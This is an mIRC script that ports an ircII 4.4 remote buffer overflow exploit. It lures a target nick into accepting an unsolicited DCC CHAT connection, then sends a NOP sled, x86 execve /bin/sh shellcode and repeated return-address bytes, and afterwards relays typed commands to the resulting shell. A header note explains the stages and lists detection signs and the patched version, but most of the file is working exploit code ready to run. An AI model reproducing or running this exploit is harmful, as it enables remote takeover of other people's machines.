; ide_expl.mrc: vade79 -> _v9[v9@fakehalo.org], www.fakehalo.org.
;
; ircii-4-4 exploit->ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat
; request instead of having them chat you, result is the same.
;
; Wrote directly from ircii-4.4.c(for *nix), that someone gave me to port to mirc.
;
; Exploit to overflow a buffer. Although, more often than not it will crash/seg fault
; with both versions of this exploit, by default offsets. (exploit noted as being for
; V4.4, and patched in V4.4M)
;
; ircii-4.4.c by: bladi & aLmUDeNa.
; ide_expl.mrc(this) by: _v9(vade79).
;
; Also included in the exploit(ircii4.4.c) were some other offsets:
;
; "SuSe 6.x :0xbfffe3ff"
; "RedHat :0xbfffe888"
;
; To load this script into mIRC5.7: /load -rs
;
; NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if
; the connection still exists, so if you see a /sockwrite error in the status window, the user
; probably seg faulted.
;
; NOTE(review): how the script is put together, for anyone studying or detecting it.
;   - /exploit_ircii <nick> -> main: opens the listening socket exp_ide_base on a random
;     free port (1024-4096) and sends <nick> a CTCP "DCC CHAT" offer carrying this client's
;     IP and that port.
;   - on SOCKLISTEN: the peer's connection is accepted as exp_ide and, without reading
;     anything first, binary data is written to it in four stages tracked by %ide.status:
;     NOP padding, the shell code plus the text /bin/sh, a busy-wait delay, then the 4 bytes
;     held in &o repeated 299 times.
;   - on INPUT: once %ide.status is 4, text typed in the script's window is written to the
;     socket unchanged.
;   - %ide.status (0..4) is only a progress counter; %ide.nick / %ide.port hold the target
;     nick and the listening port. All %ide.* variables are unset on socket/window close.
;   Defensive reading: the vulnerable side is the DCC CHAT recipient that connects back (the
;   header says ircII 4.4, fixed in 4.4M). The observable pattern is an unsolicited DCC CHAT
;   offer followed by a connection that immediately receives long runs of 0x90 bytes and a
;   client that then crashes; the remedy is the patched client and not auto-accepting DCC
;   from unknown nicks.

; bin: converts a two-character hex pair (e.g. "ff") to its decimal value.
; Returns nothing if $1 is not exactly two characters.
alias -l bin {
  if ($len($1) != 2) { return }
  var %i, %j, %k
  ; high nibble: a-f via ascii code minus 87 (a=97 -> 10); digits are used as-is.
  if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) } else { %i = $left($1,1) }
  ; low nibble, same rule.
  if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) } else { %j = $right($1,1) }
  ; %k accumulates 16 per unit of the high nibble.
  while (%i) { %k = %k + 16 | dec %i }
  return $calc(%k + %j)
}

; make_string: turns a "\xNN\xNN..." escaped string into space-separated decimal byte
; values, the form /bset expects. "\x" is first reduced to "\" so the pairs can be
; split on the backslash (token separator 92 = ascii for "\").
alias -l make_string {
  var %i = 1, %j
  while ($gettok($replace($1,\x,\),0,92) >= %i) {
    %j = %j $bin($gettok($replace($1,\x,\),%i,92))
    inc %i
  }
  return %j
}

; wn: name of the custom window all progress output goes to.
alias -l wn return @ircii4.4_dcc_exploit

; sw: guarded /sockwrite. $1- is passed straight to /sockwrite (socket name, optional
; switches, data); nothing is written unless at least two arguments are given.
; If socket exp_ide is no longer active the window is closed and the current stage
; (%ide.status) is reported instead of writing.
alias -l sw {
  if ($2) {
    if ($sock(exp_ide).status != active) {
      if ($window($wn)) { window -c $wn }
      echo -a Connection lost/non-existant. ( $+ %ide.status $+ )
    }
    else {
      ; the titlebar mirrors the last /sockwrite arguments sent.
      if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }
      sockwrite $1-
    }
  }
}

; main: $1 = target nick. (Re)opens the output window, records the nick, picks a random
; port that $portfree reports as free, listens on it as exp_ide_base, and sends the
; target a CTCP DCC CHAT offer (privmsg wrapped in $chr(1)) pointing at $longip($ip) and
; that port. The rest happens in the SOCKLISTEN handler when the target connects.
alias -l main {
  if ($window($wn)) { window -c $wn } | window -aek $wn
  echo $wn *** [01]: sending DCC chat request, waiting...
  set %ide.nick $1 | set %ide.port $rand(1024,4096)
  while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }
  sockclose exp_ide_base | socklisten exp_ide_base %ide.port
  .quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)
}

; exploit_ircii: the only public alias. Requires a server connection; refuses to run
; while the output window is open or on mIRC older than 5.7; otherwise hands $1 to main.
alias exploit_ircii {
  if ($server) {
    if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }
    elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }
    elseif ($1) { main $1 }
    else { echo -a Syntax: /exploit_ircii }
  }
}

; SOCKREAD on exp_ide: drains every available line from the peer and echoes it to the
; window ("(no data)" for an empty line). Nothing read here influences what is sent.
on 1:SOCKREAD:exp_ide: {
  if ($sockerr > 0) return
  :read
  sockread %data
  if ($sockbr == 0) return
  if (%data == $null) var %data = (no data)
  if ($window($wn)) { echo $wn -> %data }
  goto read
}

; SOCKLISTEN on exp_ide_base: the target has connected back. The connection is accepted
; as exp_ide and the listener closed; if the window is gone the socket is simply closed.
; Otherwise the payload is sent in four stages, %ide.status being incremented after each.
on 1:SOCKLISTEN:exp_ide_base: {
  sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base
  unset %ide.status
  if ($window($wn)) {
    set %ide.status 0
    echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)
    ; &nops: 16 x 0x90, written 47 times below.
    bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)
    ; &o: the 4 address bytes written one at a time in stage 4 (see the offsets listed in the header).
    bset &o 1 $make_string(\xff\xbf\xff\xe3)
    ; ^- try different offsets here.
    ; &shellcode: carried over from ircii-4.4.c; bset -t appends the text /bin/sh right after its last byte.
    bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)
    bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh
    echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)
    inc %ide.status
    echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.
    ; stage 1: 47 writes of &nops.
    var %i = 0
    while (%i < 47) {
      sw exp_ide &nops
      inc %i
    }
    inc %ide.status
    echo $wn *** [--]: * (2/4) sent, now sending the shell code.
    ; stage 2: one write of &shellcode (+ /bin/sh), then a busy-wait loop used as a delay.
    sw exp_ide &shellcode
    %i = 0 | while (%i < 9999) { inc %i }
    inc %ide.status
    echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.
    ; stage 3: 299 rounds of a short busy-wait followed by the bytes of &o, one /sockwrite per byte.
    %i = 0
    while (%i < 299) {
      var %j = 0 | while (%j < 499) { inc %j }
      var %j = 1
      while ($bvar(&o,%j)) {
        bset &bit 1 $bvar(&o,%j)
        sw exp_ide &bit
        inc %j
      }
      inc %i
    }
    inc %ide.status
    echo $wn *** [--]: * (4/4) sent, done.
  }
  else { sockclose exp_ide }
}

; SOCKCLOSE on exp_ide: peer went away; close the window, report the stage reached, clean up.
on 1:SOCKCLOSE:exp_ide: {
  if ($window($wn)) { window -c $wn }
  echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )
  unset %ide.*
}

; CLOSE: closing the output window tears down both sockets and the %ide.* variables.
on 1:CLOSE:@: {
  if ($target == $wn) {
    if ($sock(exp_ide)) { sockclose exp_ide }
    if ($sock(exp_ide_base)) { sockclose exp_ide_base }
    unset %ide.*
  }
}

; INPUT: text typed in the output window is written to exp_ide (sockwrite -n) only once
; all four stages are done (%ide.status == 4); otherwise an error is echoed. /halt stops
; mIRC from treating the text as a normal window command.
on 1:INPUT:@: {
  if ($active == $wn) {
    if ($sock(exp_ide).status == active) {
      if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }
      else { echo $wn <- $1- | sw -n exp_ide $1- }
    }
    else { echo $wn *** Error, socket status isn't online yet. }
    halt
  }
}

; LOAD: version gate at load time; unloads itself on mIRC older than 5.7.
on 1:LOAD: {
  if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }
  else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii . }
}